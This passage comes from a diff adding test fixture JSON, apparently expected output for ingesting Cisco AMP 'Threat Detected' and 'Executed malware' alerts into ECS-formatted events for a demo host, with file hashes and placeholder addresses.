+ "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533670191031648309", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:23:01.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469642099Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":926000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533670191031648000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533670191031648308", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:23:01.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469643984Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533670191031648000,\"timestamp\":1610706181,\"timestamp_nanoseconds\":533000000,\"date\":\"2021-01-15T10:23:01+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533670191031648307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533670191031648000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533670191031648307", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "process": { + "hash": { + "sha256": "5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4124" + } + }, + "@timestamp": "2021-01-15T10:22:29.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "file:///C%3A/ekjrngjker.exe", + 
"hash": { + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 3, + "ingested": "2021-09-12T17:31:04.469646010Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":15212386047828,\"timestamp\":1610706149,\"timestamp_nanoseconds\":0,\"date\":\"2021-01-15T10:22:29+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.B1380FD95B-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610706149,\"start_date\":\"2021-01-15T10:22:29+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"file:///C%3A/ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"5ad3c37e6f2b9db3ee8b5aeedc474645de90c66e3d95f8620c48102f1eba4
124\"}}}}}", + "kind": "alert", + "start": "2021-01-15T10:22:29.000Z", + "action": "Executed malware", + "id": "15212386047828", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.B1380FD95B-100.SBX.TG", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "parent": { + "disposition": "Clean", + "identity": {} + }, + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "event_type_id": 1107296272 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:22:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469647897Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":973000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643250\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669929038643000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ 
+ "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669929038643250", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:22:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469649781Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":951000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643249\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669929038643000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669929038643249", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:22:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469651657Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669929038643000,\"timestamp\":1610706120,\"timestamp_nanoseconds\":576000000,\"date\":\"2021-01-15T10:22:00+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669929038643248\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669929038643000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669929038643248", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:21:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469653537Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":333000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605487\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669671340605000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669671340605487", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:21:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "\\\\?\\C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "hostname": "Demo_AMP_Threat_Audit", + "os": { + "family": "windows", + "platform": "windows" + }, + "user": { + "name": "user@testdomain.com" + } + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469655428Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":195000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat 
Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669671340605486\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", + "kind": "alert", + "action": "Threat Detected", + "id": "6533669671340605000", + "category": [ + "file", + "malware" + ] + }, + "cisco": { + "amp": { + "detection": "W32.File.MalParent", + "computer": { + "active": true, + "network_addresses": [ + { + "mac": "63:5f:47:2b:89:91", + "ip": "10.10.10.10" + } + ], + "connector_guid": "test_connector_guid", + "external_ip": "8.8.8.8" + }, + "file": { + "disposition": "Malicious", + "identity": {} + }, + "connector_guid": "test_connector_guid", + "related": { + "mac": [ + "63:5f:47:2b:89:91" + ] + }, + "group_guids": [ + "test_group_guid" + ], + "detection_id": "6533669671340605486", + "event_type_id": 1090519054 + } + }, + "tags": [ + "preserve_original_event" + ] + }, + { + "@timestamp": "2021-01-15T10:21:00.000Z", + "file": { + "name": "ekjrngjker.exe", + "path": "C:\\ekjrngjker.exe", + "hash": { + "sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "sha256": 
"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "md5": "b99e0a8c56f963246b6464b9fffbf7a2" + } + }, + "ecs": { + "version": "1.11.0" + }, + "related": { + "user": [ + "user@testdomain.com" + ], + "hosts": [ + "Demo_AMP_Threat_Audit" + ], + "hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "ip": [ + "8.8.8.8", + "10.10.10.10" + ] + }, + "host": { + "name": "Demo_AMP_Threat_Audit", + "user": { + "name": "user@testdomain.com" + }, + "hostname": "Demo_AMP_Threat_Audit" + }, + "event": { + "severity": 2, + "ingested": "2021-09-12T17:31:04.469657309Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669671340605000,\"timestamp\":1610706060,\"timestamp_nanoseconds\":170000000,\"date\":\"2021-01-15T10:21:00+00:00\",\"event_type\":\"Threat 
